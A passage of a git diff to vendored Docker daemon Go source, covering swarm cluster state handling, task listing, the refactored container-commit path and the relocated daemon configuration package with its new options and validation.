+ return errors.WithStack(notAvailableError(msg)) + } + // release readers in here + if err := nr.Stop(); err != nil { + logrus.Errorf("failed to shut down cluster node: %v", err) + signal.DumpStacks("") + return err + } + + c.mu.Lock() + c.nr = nil + c.mu.Unlock() + + if nodeID := state.NodeID(); nodeID != "" { + nodeContainers, err := c.listContainerForNode(nodeID) + if err != nil { + return err + } + for _, id := range nodeContainers { + if err := c.config.Backend.ContainerRm(id, &apitypes.ContainerRmConfig{ForceRemove: true}); err != nil { + logrus.Errorf("error removing %v: %v", id, err) + } + } + } + + // todo: cleanup optional? + if err := clearPersistentState(c.root); err != nil { + return err + } + c.config.Backend.DaemonLeavesCluster() + return nil +} + +// Info returns information about the current cluster state. +func (c *Cluster) Info() types.Info { + info := types.Info{ + NodeAddr: c.GetAdvertiseAddress(), + } + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + info.LocalNodeState = state.status + if state.err != nil { + info.Error = state.err.Error() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + if state.IsActiveManager() { + info.ControlAvailable = true + swarm, err := c.inspect(ctx, state) + if err != nil { + info.Error = err.Error() + } + + info.Cluster = &swarm.ClusterInfo + + if r, err := state.controlClient.ListNodes(ctx, &swarmapi.ListNodesRequest{}); err != nil { + info.Error = err.Error() + } else { + info.Nodes = len(r.Nodes) + for _, n := range r.Nodes { + if n.ManagerStatus != nil { + info.Managers = info.Managers + 1 + } + } + } + } + + if state.swarmNode != nil { + for _, r := range state.swarmNode.Remotes() { + info.RemoteManagers = append(info.RemoteManagers, types.Peer{NodeID: r.NodeID, Addr: r.Addr}) + } + info.NodeID = state.swarmNode.NodeID() + } + + return info +} + +func validateAndSanitizeInitRequest(req *types.InitRequest) error { + var err error + req.ListenAddr, err = 
validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + + if req.Spec.Annotations.Name == "" { + req.Spec.Annotations.Name = "default" + } else if req.Spec.Annotations.Name != "default" { + return errors.New(`swarm spec must be named "default"`) + } + + return nil +} + +func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + if len(req.RemoteAddrs) == 0 { + return errors.New("at least 1 RemoteAddr is required to join") + } + for i := range req.RemoteAddrs { + req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i]) + if err != nil { + return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) + } + } + return nil +} + +func validateAddr(addr string) (string, error) { + if addr == "" { + return addr, errors.New("invalid empty address") + } + newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) + if err != nil { + return addr, nil + } + return strings.TrimPrefix(newaddr, "tcp://"), nil +} + +func initClusterSpec(node *swarmnode.Node, spec types.Spec) error { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + for conn := range node.ListenControlSocket(ctx) { + if ctx.Err() != nil { + return ctx.Err() + } + if conn != nil { + client := swarmapi.NewControlClient(conn) + var cluster *swarmapi.Cluster + for i := 0; ; i++ { + lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return fmt.Errorf("error on listing clusters: %v", err) + } + if len(lcr.Clusters) == 0 { + if i < 10 { + time.Sleep(200 * time.Millisecond) + continue + } + return errors.New("empty list of clusters was returned") + } + cluster = lcr.Clusters[0] + break + } + // In init, we take the initial default values from swarmkit, and merge + // any non nil or 0 value from spec 
to GRPC spec. This will leave the + // default value alone. + // Note that this is different from Update(), as in Update() we expect + // user to specify the complete spec of the cluster (as they already know + // the existing one and knows which field to update) + clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ + ClusterID: cluster.ID, + ClusterVersion: &cluster.Meta.Version, + Spec: &clusterSpec, + }) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + return nil + } + } + return ctx.Err() +} + +func (c *Cluster) listContainerForNode(nodeID string) ([]string, error) { + var ids []string + filters := filters.NewArgs() + filters.Add("label", fmt.Sprintf("com.docker.swarm.node.id=%s", nodeID)) + containers, err := c.config.Backend.Containers(&apitypes.ContainerListOptions{ + Filters: filters, + }) + if err != nil { + return []string{}, err + } + for _, c := range containers { + ids = append(ids, c.ID) + } + return ids, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/tasks.go b/vendor/github.com/docker/docker/daemon/cluster/tasks.go new file mode 100644 index 0000000000..de1240dfe8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/tasks.go @@ -0,0 +1,87 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetTasks returns a list of tasks matching the filter options. 
+func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { + var r *swarmapi.ListTasksResponse + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + filterTransform := func(filter filters.Args) error { + if filter.Contains("service") { + serviceFilters := filter.Get("service") + for _, serviceFilter := range serviceFilters { + service, err := getService(ctx, state.controlClient, serviceFilter, false) + if err != nil { + return err + } + filter.Del("service", serviceFilter) + filter.Add("service", service.ID) + } + } + if filter.Contains("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + node, err := getNode(ctx, state.controlClient, nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", node.ID) + } + } + if !filter.Contains("runtime") { + // default to only showing container tasks + filter.Add("runtime", "container") + filter.Add("runtime", "") + } + return nil + } + + filters, err := newListTasksFilters(options.Filters, filterTransform) + if err != nil { + return err + } + + r, err = state.controlClient.ListTasks( + ctx, + &swarmapi.ListTasksRequest{Filters: filters}) + return err + }); err != nil { + return nil, err + } + + tasks := make([]types.Task, 0, len(r.Tasks)) + for _, task := range r.Tasks { + t, err := convert.TaskFromGRPC(*task) + if err != nil { + return nil, err + } + tasks = append(tasks, t) + } + return tasks, nil +} + +// GetTask returns a task by an ID. 
+func (c *Cluster) GetTask(input string) (types.Task, error) { + var task *swarmapi.Task + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + t, err := getTask(ctx, state.controlClient, input) + if err != nil { + return err + } + task = t + return nil + }); err != nil { + return types.Task{}, err + } + return convert.TaskFromGRPC(*task) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/utils.go b/vendor/github.com/docker/docker/daemon/cluster/utils.go new file mode 100644 index 0000000000..d55e0012b7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/utils.go @@ -0,0 +1,63 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "encoding/json" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/pkg/ioutils" +) + +func loadPersistentState(root string) (*nodeStartConfig, error) { + dt, err := ioutil.ReadFile(filepath.Join(root, stateFile)) + if err != nil { + return nil, err + } + // missing certificate means no actual state to restore from + if _, err := os.Stat(filepath.Join(root, "certificates/swarm-node.crt")); err != nil { + if os.IsNotExist(err) { + clearPersistentState(root) + } + return nil, err + } + var st nodeStartConfig + if err := json.Unmarshal(dt, &st); err != nil { + return nil, err + } + return &st, nil +} + +func savePersistentState(root string, config nodeStartConfig) error { + dt, err := json.Marshal(config) + if err != nil { + return err + } + return ioutils.AtomicWriteFile(filepath.Join(root, stateFile), dt, 0600) +} + +func clearPersistentState(root string) error { + // todo: backup this data instead of removing? 
+ // rather than delete the entire swarm directory, delete the contents in order to preserve the inode + // (for example, allowing it to be bind-mounted) + files, err := ioutil.ReadDir(root) + if err != nil { + return err + } + + for _, f := range files { + if err := os.RemoveAll(filepath.Join(root, f.Name())); err != nil { + return err + } + } + + return nil +} + +func removingManagerCausesLossOfQuorum(reachable, unreachable int) bool { + return reachable-2 <= unreachable +} + +func isLastManager(reachable, unreachable int) bool { + return reachable == 1 && unreachable == 0 +} diff --git a/vendor/github.com/docker/docker/daemon/commit.go b/vendor/github.com/docker/docker/daemon/commit.go index 1e7bffb1dc..0f6f440514 100644 --- a/vendor/github.com/docker/docker/daemon/commit.go +++ b/vendor/github.com/docker/docker/daemon/commit.go @@ -1,9 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "encoding/json" "fmt" - "io" "runtime" "strings" "time" @@ -11,12 +9,8 @@ import ( "github.com/docker/docker/api/types/backend" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/builder/dockerfile" - "github.com/docker/docker/container" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/image" - "github.com/docker/docker/layer" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" ) // merge merges two Config, the image container configuration (defaults values), @@ -94,6 +88,9 @@ func merge(userConf, imageConf *containertypes.Config) error { if userConf.Healthcheck.Timeout == 0 { userConf.Healthcheck.Timeout = imageConf.Healthcheck.Timeout } + if userConf.Healthcheck.StartPeriod == 0 { + userConf.Healthcheck.StartPeriod = imageConf.Healthcheck.StartPeriod + } if userConf.Healthcheck.Retries == 0 { userConf.Healthcheck.Retries = imageConf.Healthcheck.Retries } @@ -117,155 +114,73 @@ func 
merge(userConf, imageConf *containertypes.Config) error { return nil } -// Commit creates a new filesystem image from the current state of a container. -// The image can optionally be tagged into a repository. -func (daemon *Daemon) Commit(name string, c *backend.ContainerCommitConfig) (string, error) { +// CreateImageFromContainer creates a new image from a container. The container +// config will be updated by applying the change set to the custom config, then +// applying that config over the existing container config. +func (daemon *Daemon) CreateImageFromContainer(name string, c *backend.CreateImageConfig) (string, error) { start := time.Now() container, err := daemon.GetContainer(name) if err != nil { return "", err } - // It is not possible to commit a running container on Windows and on Solaris. - if (runtime.GOOS == "windows" || runtime.GOOS == "solaris") && container.IsRunning() { - return "", fmt.Errorf("%+v does not support commit of a running container", runtime.GOOS) - } - - if c.Pause && !container.IsPaused() { - daemon.containerPause(container) - defer daemon.containerUnpause(container) + // It is not possible to commit a running container on Windows + if (runtime.GOOS == "windows") && container.IsRunning() { + return "", errors.Errorf("%+v does not support commit of a running container", runtime.GOOS) } - newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes) - if err != nil { - return "", err + if container.IsDead() { + err := fmt.Errorf("You cannot commit container %s which is Dead", container.ID) + return "", errdefs.Conflict(err) } - if c.MergeConfigs { - if err := merge(newConfig, container.Config); err != nil { - return "", err - } + if container.IsRemovalInProgress() { + err := fmt.Errorf("You cannot commit container %s which is being removed", container.ID) + return "", errdefs.Conflict(err) } - rwTar, err := daemon.exportContainerRw(container) - if err != nil { - return "", err + if c.Pause && !container.IsPaused() { + 
daemon.containerPause(container) + defer daemon.containerUnpause(container) } - defer func() { - if rwTar != nil { - rwTar.Close() - } - }() - - var history []image.History - rootFS := image.NewRootFS() - osVersion := "" - var osFeatures []string - if container.ImageID != "" { - img, err := daemon.imageStore.Get(container.ImageID) - if err != nil { - return "", err - } - history = img.History - rootFS = img.RootFS - osVersion = img.OSVersion - osFeatures = img.OSFeatures + if c.Config == nil { + c.Config = container.Config } - - l, err := daemon.layerStore.Register(rwTar, rootFS.ChainID()) + newConfig, err := dockerfile.BuildFromConfig(c.Config, c.Changes, container.OS) if err != nil { return "", err } - defer layer.ReleaseAndLog(daemon.layerStore, l) - - h := image.History{ - Author: c.Author, - Created: time.Now().UTC(), - CreatedBy: strings.Join(container.Config.Cmd, " "), - Comment: c.Comment, - EmptyLayer: true, - } - - if diffID := l.DiffID(); layer.DigestSHA256EmptyTar != diffID { - h.EmptyLayer = false - rootFS.Append(diffID) - } - - history = append(history, h) - - config, err := json.Marshal(&image.Image{ - V1Image: image.V1Image{ - DockerVersion: dockerversion.Version, - Config: newConfig, - Architecture: runtime.GOARCH, - OS: runtime.GOOS, - Container: container.ID, - ContainerConfig: *container.Config, - Author: c.Author, - Created: h.Created, - }, - RootFS: rootFS, - History: history, - OSFeatures: osFeatures, - OSVersion: osVersion, - }) - - if err != nil { + if err := merge(newConfig, container.Config); err != nil { return "", err } - id, err := daemon.imageStore.Create(config) + id, err := daemon.imageService.CommitImage(backend.CommitConfig{ + Author: c.Author, + Comment: c.Comment, + Config: newConfig, + ContainerConfig: container.Config, + ContainerID: container.ID, + ContainerMountLabel: container.MountLabel, + ContainerOS: container.OS, + ParentImageID: string(container.ImageID), + }) if err != nil { return "", err } - if container.ImageID != 
"" { - if err := daemon.imageStore.SetParent(id, container.ImageID); err != nil { - return "", err - } - } - - imageRef := "" + var imageRef string if c.Repo != "" { - newTag, err := reference.WithName(c.Repo) // todo: should move this to API layer + imageRef, err = daemon.imageService.TagImage(string(id), c.Repo, c.Tag) if err != nil { return "", err } - if c.Tag != "" { - if newTag, err = reference.WithTag(newTag, c.Tag); err != nil { - return "", err - } - } - if err := daemon.TagImageWithReference(id, newTag); err != nil { - return "", err - } - imageRef = newTag.String() } - - attributes := map[string]string{ + daemon.LogContainerEventWithAttributes(container, "commit", map[string]string{ "comment": c.Comment, "imageID": id.String(), "imageRef": imageRef, - } - daemon.LogContainerEventWithAttributes(container, "commit", attributes) + }) containerActions.WithValues("commit").UpdateSince(start) return id.String(), nil } - -func (daemon *Daemon) exportContainerRw(container *container.Container) (io.ReadCloser, error) { - if err := daemon.Mount(container); err != nil { - return nil, err - } - - archive, err := container.RWLayer.TarStream() - if err != nil { - daemon.Unmount(container) // logging is already handled in the `Unmount` function - return nil, err - } - return ioutils.NewReadCloserWrapper(archive, func() error { - archive.Close() - return container.RWLayer.Unmount() - }), - nil -} diff --git a/vendor/github.com/docker/docker/daemon/config.go b/vendor/github.com/docker/docker/daemon/config/config.go similarity index 60% rename from vendor/github.com/docker/docker/daemon/config.go rename to vendor/github.com/docker/docker/daemon/config/config.go index 42ef18f74a..6cda223a11 100644 --- a/vendor/github.com/docker/docker/daemon/config.go +++ b/vendor/github.com/docker/docker/daemon/config/config.go @@ -1,4 +1,4 @@ -package daemon +package config // import "github.com/docker/docker/daemon/config" import ( "bytes" @@ -7,39 +7,42 @@ import ( "fmt" "io" 
"io/ioutil" + "os" + "reflect" "runtime" "strings" "sync" - "github.com/Sirupsen/logrus" + daemondiscovery "github.com/docker/docker/daemon/discovery" "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/authorization" "github.com/docker/docker/pkg/discovery" "github.com/docker/docker/registry" "github.com/imdario/mergo" + "github.com/sirupsen/logrus" "github.com/spf13/pflag" ) const ( - // defaultMaxConcurrentDownloads is the default value for + // DefaultMaxConcurrentDownloads is the default value for // maximum number of downloads that // may take place at a time for each pull. - defaultMaxConcurrentDownloads = 3 - // defaultMaxConcurrentUploads is the default value for + DefaultMaxConcurrentDownloads = 3 + // DefaultMaxConcurrentUploads is the default value for // maximum number of uploads that // may take place at a time for each push. - defaultMaxConcurrentUploads = 5 - // stockRuntimeName is the reserved name/alias used to represent the + DefaultMaxConcurrentUploads = 5 + // StockRuntimeName is the reserved name/alias used to represent the // OCI runtime being shipped with the docker daemon package. 
- stockRuntimeName = "runc" -) - -const ( - defaultNetworkMtu = 1500 - disableNetworkBridge = "none" -) - -const ( - defaultShutdownTimeout = 15 + StockRuntimeName = "runc" + // DefaultShmSize is the default value for container's shm size + DefaultShmSize = int64(67108864) + // DefaultNetworkMtu is the default value for network MTU + DefaultNetworkMtu = 1500 + // DisableNetworkBridge is the default value of the option to disable network bridge + DisableNetworkBridge = "none" + // DefaultInitBinary is the name of the default init binary + DefaultInitBinary = "docker-init" ) // flatOptions contains configuration keys @@ -68,6 +71,12 @@ type commonBridgeConfig struct { FixedCIDR string `json:"fixed-cidr,omitempty"` } +// NetworkConfig stores the daemon-wide networking configurations +type NetworkConfig struct { + // Default address pools for docker networks + DefaultAddressPools opts.PoolsOpt `json:"default-address-pools,omitempty"` +} + // CommonTLSOptions defines TLS configuration for the daemon server. // It includes json tags to deserialize configuration from a file // using the same names that the flags in the command line use. @@ -82,25 +91,33 @@ type CommonTLSOptions struct { // It includes json tags to deserialize configuration from a file // using the same names that the flags in the command line use. 
type CommonConfig struct { - AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins - AutoRestart bool `json:"-"` - Context map[string][]string `json:"-"` - DisableBridge bool `json:"-"` - DNS []string `json:"dns,omitempty"` - DNSOptions []string `json:"dns-opts,omitempty"` - DNSSearch []string `json:"dns-search,omitempty"` - ExecOptions []string `json:"exec-opts,omitempty"` - GraphDriver string `json:"storage-driver,omitempty"` - GraphOptions []string `json:"storage-opts,omitempty"` - Labels []string `json:"labels,omitempty"` - Mtu int `json:"mtu,omitempty"` - Pidfile string `json:"pidfile,omitempty"` - RawLogs bool `json:"raw-logs,omitempty"` - Root string `json:"graph,omitempty"` - SocketGroup string `json:"group,omitempty"` - TrustKeyPath string `json:"-"` - CorsHeaders string `json:"api-cors-header,omitempty"` - EnableCors bool `json:"api-enable-cors,omitempty"` + AuthzMiddleware *authorization.Middleware `json:"-"` + AuthorizationPlugins []string `json:"authorization-plugins,omitempty"` // AuthorizationPlugins holds list of authorization plugins + AutoRestart bool `json:"-"` + Context map[string][]string `json:"-"` + DisableBridge bool `json:"-"` + DNS []string `json:"dns,omitempty"` + DNSOptions []string `json:"dns-opts,omitempty"` + DNSSearch []string `json:"dns-search,omitempty"` + ExecOptions []string `json:"exec-opts,omitempty"` + GraphDriver string `json:"storage-driver,omitempty"` + GraphOptions []string `json:"storage-opts,omitempty"` + Labels []string `json:"labels,omitempty"` + Mtu int `json:"mtu,omitempty"` + NetworkDiagnosticPort int `json:"network-diagnostic-port,omitempty"` + Pidfile string `json:"pidfile,omitempty"` + RawLogs bool `json:"raw-logs,omitempty"` + RootDeprecated string `json:"graph,omitempty"` + Root string `json:"data-root,omitempty"` + ExecRoot string `json:"exec-root,omitempty"` + SocketGroup string `json:"group,omitempty"` + CorsHeaders string 
`json:"api-cors-header,omitempty"` + + // TrustKeyPath is used to generate the daemon ID and for signing schema 1 manifests + // when pushing to a registry which does not support schema 2. This field is marked as + // deprecated because schema 1 manifests are deprecated in favor of schema 2 and the + // daemon ID will use a dedicated identifier not shared with exported signatures. + TrustKeyPath string `json:"deprecated-key-path,omitempty"` // LiveRestoreEnabled determines whether we should keep containers // alive upon daemon shutdown/start @@ -147,70 +164,54 @@ type CommonConfig struct { // given to the /swarm/init endpoint and no advertise address is // specified. SwarmDefaultAdvertiseAddr string `json:"swarm-default-advertise-addr"` - MetricsAddress string `json:"metrics-addr"` + + // SwarmRaftHeartbeatTick is the number of ticks in time for swarm mode raft quorum heartbeat + // Typical value is 1 + SwarmRaftHeartbeatTick uint32 `json:"swarm-raft-heartbeat-tick"` + + // SwarmRaftElectionTick is the number of ticks to elapse before followers in the quorum can propose + // a new round of leader election. Default, recommended value is at least 10X that of Heartbeat tick. + // Higher values can make the quorum less sensitive to transient faults in the environment, but this also + // means it takes longer for the managers to detect a down leader. + SwarmRaftElectionTick uint32 `json:"swarm-raft-election-tick"` + + MetricsAddress string `json:"metrics-addr"` LogConfig - bridgeConfig // bridgeConfig holds bridge network specific configuration. + BridgeConfig // bridgeConfig holds bridge network specific configuration. + NetworkConfig registry.ServiceOptions - reloadLock sync.Mutex - valuesSet map[string]interface{} + sync.Mutex + // FIXME(vdemeester) This part is not that clear and is mainly dependent on cli flags + // It should probably be handled outside this package. 
+ ValuesSet map[string]interface{} `json:"-"` Experimental bool `json:"experimental"` // Experimental indicates whether experimental features should be exposed or not -} -// InstallCommonFlags adds flags to the pflag.FlagSet to configure the daemon -func (config *Config) InstallCommonFlags(flags *pflag.FlagSet) { - var maxConcurrentDownloads, maxConcurrentUploads int - - config.ServiceOptions.InstallCliFlags(flags) - - flags.Var(opts.NewNamedListOptsRef("storage-opts", &config.GraphOptions, nil), "storage-opt", "Storage driver options") - flags.Var(opts.NewNamedListOptsRef("authorization-plugins", &config.AuthorizationPlugins, nil), "authorization-plugin", "Authorization plugins to load") - flags.Var(opts.NewNamedListOptsRef("exec-opts", &config.ExecOptions, nil), "exec-opt", "Runtime execution options") - flags.StringVarP(&config.Pidfile, "pidfile", "p", defaultPidFile, "Path to use for daemon PID file") - flags.StringVarP(&config.Root, "graph", "g", defaultGraph, "Root of the Docker runtime") - flags.BoolVarP(&config.AutoRestart, "restart", "r", true, "--restart on the daemon has been deprecated in favor of --restart policies on docker run") - flags.MarkDeprecated("restart", "Please use a restart policy on docker run") - flags.StringVarP(&config.GraphDriver, "storage-driver", "s", "", "Storage driver to use") - flags.IntVar(&config.Mtu, "mtu", 0, "Set the containers network MTU") - flags.BoolVar(&config.RawLogs, "raw-logs", false, "Full timestamps without ANSI coloring") - // FIXME: why the inconsistency between "hosts" and "sockets"? 
- flags.Var(opts.NewListOptsRef(&config.DNS, opts.ValidateIPAddress), "dns", "DNS server to use") - flags.Var(opts.NewNamedListOptsRef("dns-opts", &config.DNSOptions, nil), "dns-opt", "DNS options to use") - flags.Var(opts.NewListOptsRef(&config.DNSSearch, opts.ValidateDNSSearch), "dns-search", "DNS search domains to use") - flags.Var(opts.NewNamedListOptsRef("labels", &config.Labels, opts.ValidateLabel), "label", "Set key=value labels to the daemon") - flags.StringVar(&config.LogConfig.Type, "log-driver", "json-file", "Default driver for container logs") - flags.Var(opts.NewNamedMapOpts("log-opts", config.LogConfig.Config, nil), "log-opt", "Default log driver options for containers") - flags.StringVar(&config.ClusterAdvertise, "cluster-advertise", "", "Address or interface name to advertise") - flags.StringVar(&config.ClusterStore, "cluster-store", "", "URL of the distributed storage backend") - flags.Var(opts.NewNamedMapOpts("cluster-store-opts", config.ClusterOpts, nil), "cluster-store-opt", "Set cluster store options") - flags.StringVar(&config.CorsHeaders, "api-cors-header", "", "Set CORS headers in the Engine API") - flags.IntVar(&maxConcurrentDownloads, "max-concurrent-downloads", defaultMaxConcurrentDownloads, "Set the max concurrent downloads for each pull") - flags.IntVar(&maxConcurrentUploads, "max-concurrent-uploads", defaultMaxConcurrentUploads, "Set the max concurrent uploads for each push") - flags.IntVar(&config.ShutdownTimeout, "shutdown-timeout", defaultShutdownTimeout, "Set the default shutdown timeout") - - flags.StringVar(&config.SwarmDefaultAdvertiseAddr, "swarm-default-advertise-addr", "", "Set default address or interface for swarm advertised address") - flags.BoolVar(&config.Experimental, "experimental", false, "Enable experimental features") - - flags.StringVar(&config.MetricsAddress, "metrics-addr", "", "Set default address and port to serve the metrics api on") - - config.MaxConcurrentDownloads = &maxConcurrentDownloads - 
config.MaxConcurrentUploads = &maxConcurrentUploads + // Exposed node Generic Resources + // e.g: ["orange=red", "orange=green", "orange=blue", "apple=3"] + NodeGenericResources []string `json:"node-generic-resources,omitempty"` + // NetworkControlPlaneMTU allows to specify the control plane MTU, this will allow to optimize the network use in some components + NetworkControlPlaneMTU int `json:"network-control-plane-mtu,omitempty"` + + // ContainerAddr is the address used to connect to containerd if we're + // not starting it ourselves + ContainerdAddr string `json:"containerd,omitempty"` } // IsValueSet returns true if a configuration value // was explicitly set in the configuration file. -func (config *Config) IsValueSet(name string) bool { - if config.valuesSet == nil { +func (conf *Config) IsValueSet(name string) bool { + if conf.ValuesSet == nil { return false } - _, ok := config.valuesSet[name] + _, ok := conf.ValuesSet[name] return ok } -// NewConfig returns a new fully initialized Config struct -func NewConfig() *Config { +// New returns a new fully initialized Config struct +func New() *Config { config := Config{} config.LogConfig.Config = make(map[string]string) config.ClusterOpts = make(map[string]string) @@ -221,15 +222,13 @@ func NewConfig() *Config { return &config } -func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { - if runtime.GOOS == "solaris" && (clusterAdvertise != "" || clusterStore != "") { - return "", errors.New("Cluster Advertise Settings not supported on Solaris") - } +// ParseClusterAdvertiseSettings parses the specified advertise settings +func ParseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (string, error) { if clusterAdvertise == "" { - return "", errDiscoveryDisabled + return "", daemondiscovery.ErrDiscoveryDisabled } if clusterStore == "" { - return "", fmt.Errorf("invalid cluster configuration. 
--cluster-advertise must be accompanied by --cluster-store configuration") + return "", errors.New("invalid cluster configuration. --cluster-advertise must be accompanied by --cluster-store configuration") } advertise, err := discovery.ParseAdvertise(clusterAdvertise) @@ -239,7 +238,7 @@ func parseClusterAdvertiseSettings(clusterStore, clusterAdvertise string) (strin return advertise, nil } -// GetConflictFreeLabels validate Labels for conflict +// GetConflictFreeLabels validates Labels for conflict // In swarm the duplicates for labels are removed // so we only take same values here, no conflict values // If the key-value is the same we will only take the last label @@ -263,34 +262,46 @@ func GetConflictFreeLabels(labels []string) ([]string, error) { return newLabels, nil } -// ReloadConfiguration reads the configuration in the host and reloads the daemon and server. -func ReloadConfiguration(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { +// ValidateReservedNamespaceLabels errors if the reserved namespaces com.docker.*, +// io.docker.*, org.dockerproject.* are used in a configured engine label. +// +// TODO: This is a separate function because we need to warn users first of the +// deprecation. When we return an error, this logic can be added to Validate +// or GetConflictFreeLabels instead of being here. +func ValidateReservedNamespaceLabels(labels []string) error { + for _, label := range labels { + lowered := strings.ToLower(label) + if strings.HasPrefix(lowered, "com.docker.") || strings.HasPrefix(lowered, "io.docker.") || + strings.HasPrefix(lowered, "org.dockerproject.") { + return fmt.Errorf( + "label %s not allowed: the namespaces com.docker.*, io.docker.*, and org.dockerproject.* are reserved for Docker's internal use", + label) + } + } + return nil +} + +// Reload reads the configuration in the host and reloads the daemon and server. 
+func Reload(configFile string, flags *pflag.FlagSet, reload func(*Config)) error { logrus.Infof("Got signal to reload configuration, reloading from: %s", configFile) newConfig, err := getConflictFreeConfiguration(configFile, flags) if err != nil { - return err + if flags.Changed("config-file") || !os.IsNotExist(err) { + return fmt.Errorf("unable to configure the Docker daemon with file %s: %v", configFile, err) + } + newConfig = New() } - if err := ValidateConfiguration(newConfig); err != nil { + if err := Validate(newConfig); err != nil { return fmt.Errorf("file configuration validation failed (%v)", err) } - // Labels of the docker engine used to allow multiple values associated with the same key. - // This is deprecated in 1.13, and, be removed after 3 release cycles. - // The following will check the conflict of labels, and report a warning for deprecation. - // - // TODO: After 3 release cycles (1.16) an error will be returned, and labels will be - // sanitized to consolidate duplicate key-value pairs (config.Labels = newLabels): - // - // newLabels, err := GetConflictFreeLabels(newConfig.Labels) - // if err != nil { - // return err - // } - // newConfig.Labels = newLabels - // - if _, err := GetConflictFreeLabels(newConfig.Labels); err != nil { - logrus.Warnf("Engine labels with duplicate keys and conflicting values have been deprecated: %s", err) + // Check if duplicate label-keys with different values are found + newLabels, err := GetConflictFreeLabels(newConfig.Labels) + if err != nil { + return err } + newConfig.Labels = newLabels reload(newConfig) return nil @@ -312,8 +323,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config return nil, err } - if err := ValidateConfiguration(fileConfig); err != nil { - return nil, fmt.Errorf("file configuration validation failed (%v)", err) + if err := Validate(fileConfig); err != nil { + return nil, fmt.Errorf("configuration validation from file failed (%v)", err) } // merge flags 
configuration on top of the file configuration @@ -323,8 +334,8 @@ func MergeDaemonConfigurations(flagsConfig *Config, flags *pflag.FlagSet, config // We need to validate again once both fileConfig and flagsConfig // have been merged - if err := ValidateConfiguration(fileConfig); err != nil { - return nil, fmt.Errorf("file configuration validation failed (%v)", err) + if err := Validate(fileConfig); err != nil { + return nil, fmt.Errorf("merged configuration validation from file and command line flags failed (%v)", err) } return fileConfig, nil @@ -384,12 +395,25 @@ func getConflictFreeConfiguration(configFile string, flags *pflag.FlagSet) (*Con }) } - config.valuesSet = configSet + config.ValuesSet = configSet } reader = bytes.NewReader(b) - err = json.NewDecoder(reader).Decode(&config) - return &config, err + if err := json.NewDecoder(reader).Decode(&config); err != nil { + return nil, err + } + + if config.RootDeprecated != "" { + logrus.Warn(`The "graph" config file option is deprecated. Please use "data-root" instead.`) + + if config.Root != "" { + return nil, fmt.Errorf(`cannot specify both "graph" and "data-root" config file options`) + } + + config.Root = config.RootDeprecated + } + + return &config, nil } // configValuesSet returns the configuration values explicitly set in the file. @@ -472,10 +496,10 @@ func findConfigurationConflicts(config map[string]interface{}, flags *pflag.Flag return nil } -// ValidateConfiguration validates some specific configs. +// Validate validates some specific configs. // such as config.DNS, config.Labels, config.DNSSearch, // as well as config.MaxConcurrentDownloads, config.MaxConcurrentUploads. 
-func ValidateConfiguration(config *Config) error { +func Validate(config *Config) error { // validate DNS for _, dns := range config.DNS { if _, err := opts.ValidateIPAddress(dns); err != nil { @@ -496,30 +520,48 @@ func ValidateConfiguration(config *Config) error { return err } } - // validate MaxConcurrentDownloads - if config.IsValueSet("max-concurrent-downloads") && config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { + if config.MaxConcurrentDownloads != nil && *config.MaxConcurrentDownloads < 0 { return fmt.Errorf("invalid max concurrent downloads: %d", *config.MaxConcurrentDownloads) } - // validate MaxConcurrentUploads - if config.IsValueSet("max-concurrent-uploads") && config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { + if config.MaxConcurrentUploads != nil && *config.MaxConcurrentUploads < 0 { return fmt.Errorf("invalid max concurrent uploads: %d", *config.MaxConcurrentUploads) } // validate that "default" runtime is not reset if runtimes := config.GetAllRuntimes(); len(runtimes) > 0 { - if _, ok := runtimes[stockRuntimeName]; ok { - return fmt.Errorf("runtime name '%s' is reserved", stockRuntimeName) + if _, ok := 